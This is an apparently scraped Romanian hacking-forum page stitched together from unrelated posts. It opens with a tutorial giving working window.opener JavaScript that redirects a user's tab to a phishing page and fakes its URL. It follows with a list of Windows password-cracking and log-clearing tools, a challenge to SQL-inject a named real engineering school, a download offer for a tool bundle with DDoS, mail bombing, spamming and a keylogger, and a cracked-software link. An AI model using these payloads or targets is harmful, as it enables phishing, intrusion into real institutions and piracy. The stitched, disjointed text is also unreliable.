Leaderboard

Sper s? nu gre?esc dac? voi spune, c? ?tim cu to?ii ce e un link ?i la ce folose?te atributul target pentru tag-ul <a>. ?i dat fiind faptul c? majoritatea consider? inofensiv? folosirea acestei tehnici atât de populare, în acest tutorial voi încerca s? demonstrez contrariul. Pentru început vreau s? men?ionez c? ceea ce va fi descris aici, personal o consider a fiind o vulnerabilitate pentru toate browserele cu excep?ia... ta-da! — Internet Explorer. Iat? de ce în continuare voi folosi cuvântul „vulnerabilitate” atunci când m? voi referi la acest „fenomen”. De asemenea, v? rog s? atrage?i aten?ia c? aceast? vulnerabilitate v-a func?iona perfect doar dac? se va ap?sa click de stânga pe link, ?i nu click de dreapta ? „Deschide în fil? nou?”. ?i, nu în ultimul rând, a?a cum toat? lumea recomand? s? fie folosit target="_blank" pentru toate link-urile externe (doar nu dorim ca utilizatorul s? p?r?seasc? pagina noastr?), trebuie s? constat c? aceast? vulnerabilitate afecteaz? majoritatea site-urilor care fac referire la pagini externe. Teorie Dac? avem pagina curent? „A” ?i facem referire la pagina „B” folosind atributul target="_blank", atunci când se va deschide pagina „B” pentru aceasta va fi creat un obiect window.opener cu ajutorului c?ruia putem redirec?iona pagina „A” c?tre o nou? pagin? în timp ce utilizatorul acceseaz? pagina „B”. ?i cel mai important, paginile „A” ?i „B” pot fi pe domenii diferite. Practic? Pentru a în?elege mai bine despre ce merge vorba, v? recomand urm?torul exemplu: ap?sa?i click aici, a?tepta?i s? se încarce pagina, dup? care reveni?i înapoi. Dac? apare eroarea „window.opener is null” atunci: Ai deschis link-ul altfel decât folosind click de stânga; Browserul t?u nu e vulnerabil; Magie neagr?? Pentru un exemplu mai complex, v? rog s? accesa?i aceast? pagin? unde am folosit aceast? vulnerabilitate pentru a simula un atac de tip phishing asupra unui site ce ofer? servicii de email. Ca ?i pentru oricare site asem?n?tor (Gmail, Hotmail ?.a.) fiecare link primit într-un mesaj are atributul target="_blank". Explica?ii Pentru a exploata vulnerabilitatea, trimitem un mesaj ce con?ine adresa URL c?tre pagina „capcan?”, unde pentru a fi siguri c? utilizatorul a deschis link-ul, folosind click de stânga ?i nu alt? metod?, verific?m dac? exist? obiectul window.opener ?i nu este NULL. Dup? care, putem redirec?iona pagina de unde a venit utilizatorul. Codul arat? cam a?a: if (window.opener) { window.opener.location.replace('full-url-to-scam-page'); } Dup? cum pute?i observa, totul e atât de simplu, atât de banal, atât de periculos... Dac? pagina de phishing ?i cea legitim? arat? ca 2 pic?turi de ap?, iar numele domeniului nu d? de b?nuit, când utilizatorul va reveni la pagina ini?ial? cu siguran??, nu va observa modificarea. Pentru a da mai pu?in de b?nuit, poate fi modificat? adresa URL pentru pagina de phishing în felul urm?tor: De pe pagina funny.php e nevoie s? trimitem adresa URL (referrer) de unde a venit utilizatorul. Eu am f?cut a?a: var referrer = encodeURIComponent(document.referrer); window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer; Apoi, pe pagina scam.php am folosit urm?torul cod: // Extragem leg?tura adresei URL ?i elimin?m numele domeniului var fakeurl = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', ''); // Modific?m adresa URL f?r? a înc?rca con?inutul acelei pagini window.history.pushState(false, false, fake_url); În loc de concluzii Sincer, nu în?eleg, ce a fost în capul dezvoltatorilor ca s? permit? executarea func?iei location.replace() sau modificarea obiectului location dintre dou? domenii diferite? Dac? era de pe acela?i domeniu, în?elegeam... ?i chiar e foarte straniu, c?ci celelalte func?ii ?i atribute ale obiectului window.opener nu pot nici m?car citite, deoarece:

Windows Tools For Penetration Testing Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system. HashCheck Shell Extension The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files). Netcat Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Metasploit Framework The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. RealVNC Viewer Remote access software for desktop and mobile platforms. GetIf SNMP tool that allows you to collect information about SNMP devices. Cain & Abel Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. Wireshark Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development. PuTTY PuTTY is an SSH and telnet client for the Windows platform. Pass The Hash Toolkit The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes. Cachedump Recovering Windows Password Cache Entries. Fport Identify unknown open ports and their associated applications. Nbtscan This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Winfo Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed. ClearLogs ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer. SQLDict SQLdict is a dictionary attack tool for SQL Server. PMDump PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process. GrabItAll GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too. DumpUsers DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1. BrowseList BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading). Remoxec Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation). WMICracker Brute-force tool for Windows Management Instrumentation (WMI). Venom Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled. SMBAT The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms. RPCScan RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. LSASecretsDump LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window. SQLPing SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever. OAT The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers. Pwdump7 Extract password hashes from local user accounts. PsTools The PsTools package provides a set of command line utilities that allow you to manage local and remote systems. Incognito Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators. DumpSec DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information. X-Deep32 X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc. LC5 Windows password cracker. Ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. SiVuS SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations. Sursa: Windows Tools For Penetration Testing

Target: SURYA SCHOOL OF ENGINEERING AND TECHNOLOGY Method:union based Proof: Post a picture with version and your name. PM me sintax . Solvers: afumat Praetorian ajkaro Boogy fallen_angel pedala1 sweby

Mereu copia?i, niciodat? egala?i. S? moar? du?manii, nu Nytro?

Înc? o completare care se aplic? de acum. Încerca?i s? nu posta?i într-un topic dac? el a fost mutat între timp la co?ul de gunoi sau ini?iatorul a fost banat. Desigur c? exist? ?i excep?ii

Completare la regula 4, care este des înc?lcat?. Minim 10 post-uri de CALITATE, c? a?a oricine poate umple forumul cu "bun?" ?i Fun Stuff, ca s? poat? s? fac? leeching/beneficieze de ajutor cât mai repede.

Acest topic a ajuns ca un chat din cate vad. Tot urmaresc fiecare post si imi dau cu parerea la cat de impertinenti sunt unii de aici. In loc sa spuneti multumesc si sa fiti o echipa voi(defapt unii dintre voi) comentati aiurea. Exista chat sa va certati si sa va criticati. Salpa

Red theme: Blue theme: Program options: ?IP Port Scanner; Web IP Finder; IP Resolver Locator. DDoS ?Email Sender; Bomb; HackIP; Yahoo! Spammer ?Hashing MD5, SHA1, SHA512; MD5 Cracker; Binary (String to Binary and Binary to String). ?My System System Information; Local Keylogger; Kill Procces; Task Manager (Enable/Disable). ?Other Tools Text To Speech; Avatar Grabber; Shutdown, Restart; Hackyard Browser. Virus scan: Download Link: Download Hackyard.Multi.Tool.rar @ UppIT Pass: praetorian@hackyard.net

Software name : IntelliLock Version : 1.7.0.0 Release Type : Full Version Last Updated : 4 January 2013 - 4:36 PM OS : Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8 (x86/x64) Developer : Eziriz Web-site : http://www.eziriz.com/ Cracked.by.yoza[upK] WHAT'S NEW: - [+] Added Visual Sudio 2012 Add-in including example projects - [+] Added Anti-Clock freezing protection technique - [+] Full .NET 4.5 Support - [+] Full Windows Phone 8 protection support - [!] Fixed IL Code Encryption issue on Windows 8 - [!] Fixed digital signing issue on windows 8 - [!] Fixed Inject Invalid Metadata issue on x64 systems - [!] Fixed strong name signing issue on x64 assemblies - [!] Fixed debug database file (.pdb) issue - [!] Fixed Silverlight 5 problem automatically loading referenced dependencies https://www.box.com/s/n0oy4zhzr6wopkt95e87